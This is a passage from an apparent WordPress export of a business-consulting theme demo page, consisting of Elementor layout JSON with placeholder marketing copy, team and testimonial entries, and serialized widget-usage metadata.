Business","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"bold"},"elements":[],"widgetType":"iheading"},{"id":"bb4f4ed","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent into the firm, acquiring new companies, and developing new capabilities, for example, in design.<\/p><hr \/><p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"983ee34","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"3d77923","elType":"column","settings":{"_column_size":50,"_inline_size":null,"border_border":"solid","border_width":{"unit":"px","top":"0","right":"1","bottom":"0","left":"0","isLinked":false},"border_width_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"border_color":"#00000026"},"elements":[{"id":"0f29b46","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/signature-home3.png","id":1601},"image_size":"full","align":"left","align_tablet":"right","align_mobile":"left","_padding_tablet":{"unit":"px","top":"0","right":"35","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"02cefd4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"d2c189c","elType":"widget","settings":{"title":"Peter Adams","header_size":"h6","typography_font_family":"Roboto","typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"4146a85","elType":"widget","settings":{"editor":"<p>co-founder of company<\/p>","text_color":"#878787","typography_typography":"custom","typography_font_family":"Raleway","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"500","typography_text_transform":"uppercase"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6af12be","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"112","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"9865002","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"0c75221","elType":"widget","settings":{"title":"Trusted <br>Clients","number":"350","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Open Sans","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"number_typography_font_weight":"bold","title_typography_font_family":"Raleway","title_typography_font_weight":"600","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"4efe597","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"3976936","elType":"widget","settings":{"title":"Finished <br>Projects","number":"215","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Open Sans","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_typography_font_family":"Raleway","title_typography_font_weight":"600","number_typography_font_weight":"bold","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"7d86b75","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"75279d9","elType":"widget","settings":{"title":"Years of <br>Experience","number":"15","number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Open Sans","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_typography_font_family":"Raleway","title_typography_font_weight":"600","number_typography_font_weight":"bold","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"7c9f8c9","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"5e295b7","elType":"widget","settings":{"title":"Visited<br>Conferences","number":"36","number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Open Sans","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_typography_font_family":"Raleway","title_typography_font_weight":"600","number_typography_font_weight":"bold","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false}],"isInner":false},{"id":"07bb3a8","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-about-us.jpg","id":2044},"background_position":"top center","background_repeat":"no-repeat","padding":{"unit":"px","top":"117","right":"0","bottom":"66","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"9fed965","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"d2ab48f","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"44","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"ad3790a","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"ca838f8","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"ba65ecc","elType":"widget","settings":{"sub":"what we do","title":"Creating Your Startup Business","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"bold"},"elements":[],"widgetType":"iheading"},{"id":"260733b","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center","text_color":"#FFFFFF"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"bdb7238","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"658246c","elType":"widget","settings":{"image_boxes":[{"_id":"e6758bb","image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features1-about-us.jpg","id":2041},"title_box":"Accounting & Finance","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features2-about-us.jpg","id":2042},"title_box":"Management Skills","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"112b6ab"},{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features3-about-us.jpg","id":2043},"title_box":"Business Planning","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"8732ef5"}],"label_link":"Explore More","box_bg":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[],"widgetType":"iiboxcarousel"}],"isInner":false}],"isInner":false},{"id":"edf75b3","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"dda17b7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"1b3917e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image2-about-us.png","id":2048},"image_size":"full"},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"3490ca0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"8df0dd7","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","_margin":{"unit":"px","top":"-70","right":"0","bottom":"0","left":"0","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"9bcd87a","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a428896","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"17","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"},{"id":"2c76de7","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"17","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"},{"id":"2e8f3f7","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":false}],"isInner":false},{"id":"d0493f4","elType":"section","settings":{"background_background":"classic","background_color":"#262832","padding":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"bfd67a8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"829ba7d","elType":"widget","settings":{"image_carousel":[{"_id":"46a0442","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01.svg","id":2002},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"24adf3d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02.svg","id":2003},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"90b7ac2","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03.svg","id":2004},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04.svg","id":2005},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""},"_id":"cb5bb18"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05.svg","id":2006},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""},"_id":"e595c69"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06.svg","id":2007},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""},"_id":"6fa2f0f"}],"tshow":"6","tshow_tablet":"4","dots":"false","img_spacing":{"unit":"px","size":80,"sizes":[]},"img_css_filters_hover_css_filter":"custom"},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false},{"id":"0308eae","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-about-us.jpg","id":520},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"175","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"140","left":"0","isLinked":false}},"elements":[{"id":"12b16f2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"61fb36b","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e5ca1cb","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"4431150","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"e15f0b3","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"dc4d425","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"bec6367","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"324dce4","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":1940},"tname":"Oliver Simson","tjob":"client of company","_id":"560686e"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"18ebffe"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"25d98b7"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":1940},"tname":"Oliver Simson","tjob":"client of company","_id":"1180cad"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"0f71845"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"2d0cde6"}],"tshow":"3","loop":"true"},"elements":[],"widgetType":"itestimonials"}],"isInner":false}],"isInner":false},{"id":"e76f400","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"beac444","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"eab9ff6","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7fb7005","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"b8f3d6d","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"532ec06","elType":"widget","settings":{"sub":"our team","title":"Our Skilled Leaders","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"f9af862","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"0e38994","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"9a95313","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"0b610b3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2828095","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team1.jpg","id":2056},"member_name":"Monica Black","member_extra":"chief communication officer","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"job_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"c25c0ad","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f09ab14","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team2.jpg","id":2057},"member_name":"Peter Perish","member_extra":"chief business project","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"job_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"ec58039","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"e65282d","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team3.jpg","id":2058},"member_name":"Olivia Woodson","member_extra":"international consultant","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"job_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"13da770","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f627004","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team4.jpg","id":2059},"member_name":"Peter Adams","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true},{"id":"35690a4","elType":"widget","settings":{"align":"center","text":"Explore More ","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-team","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2021]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:13:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:2;s:12:"align_tablet";i:1;s:12:"align_mobile";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:12:"width_tablet";i:1;}}s:8:"advanced";a:2:{s:14:"_section_style";a:5:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}s:15:"_section_border";a:2:{s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:27;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:27;s:19:"_inline_size_tablet";i:21;s:19:"_inline_size_mobile";i:4;}}s:5:"style";a:1:{s:14:"section_border";a:4:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:19:"border_width_mobile";i:1;s:12:"border_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:6:"margin";i:2;s:13:"margin_mobile";i:1;s:13:"margin_tablet";i:2;}}}}s:8:"iheading";a:3:{s:5:"count";i:5;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:5;s:5:"title";i:5;s:11:"header_size";i:5;s:5:"align";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:5;s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:5:{s:9:"stitle_bg";i:5;s:28:"stitle_typography_typography";i:5;s:27:"stitle_typography_font_size";i:5;s:29:"stitle_typography_font_weight";i:2;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:6;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:7:{s:10:"text_color";i:2;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:25:"typography_text_transform";i:1;s:5:"align";i:3;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:11:"header_size";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:2:{s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:12;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:5;s:3:"gap";i:6;s:16:"content_position";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:8;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:10;s:14:"padding_mobile";i:6;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:2;s:19:"background_position";i:3;s:17:"background_repeat";i:3;s:16:"background_color";i:1;s:15:"background_size";i:2;}}}}s:8:"icounter";a:3:{s:5:"count";i:4;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:4;s:6:"number";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}s:5:"style";a:1:{s:21:"style_content_section";a:11:{s:28:"number_typography_typography";i:4;s:34:"number_typography_font_size_mobile";i:4;s:18:"title_space_mobile";i:4;s:27:"title_typography_typography";i:4;s:33:"title_typography_font_size_mobile";i:4;s:29:"number_typography_font_family";i:4;s:27:"number_typography_font_size";i:4;s:29:"number_typography_font_weight";i:4;s:28:"title_typography_font_family";i:4;s:28:"title_typography_font_weight";i:4;s:28:"title_typography_line_height";i:4;}}}}s:13:"iiboxcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:11:"image_boxes";i:1;}}s:5:"style";a:1:{s:21:"style_content_section";a:1:{s:6:"box_bg";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:10:"lbar_color";i:3;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:2:{s:11:"img_spacing";i:1;s:32:"img_css_filters_hover_css_filter";i:1;}}}}s:13:"itestimonials";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:20:"section_testimonials";a:3:{s:12:"testi_slider";i:1;s:5:"tshow";i:1;s:4:"loop";i:1;}}}}s:7:"imember";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:12:"member_image";i:4;s:11:"member_name";i:3;s:12:"member_extra";i:3;s:12:"social_share";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet"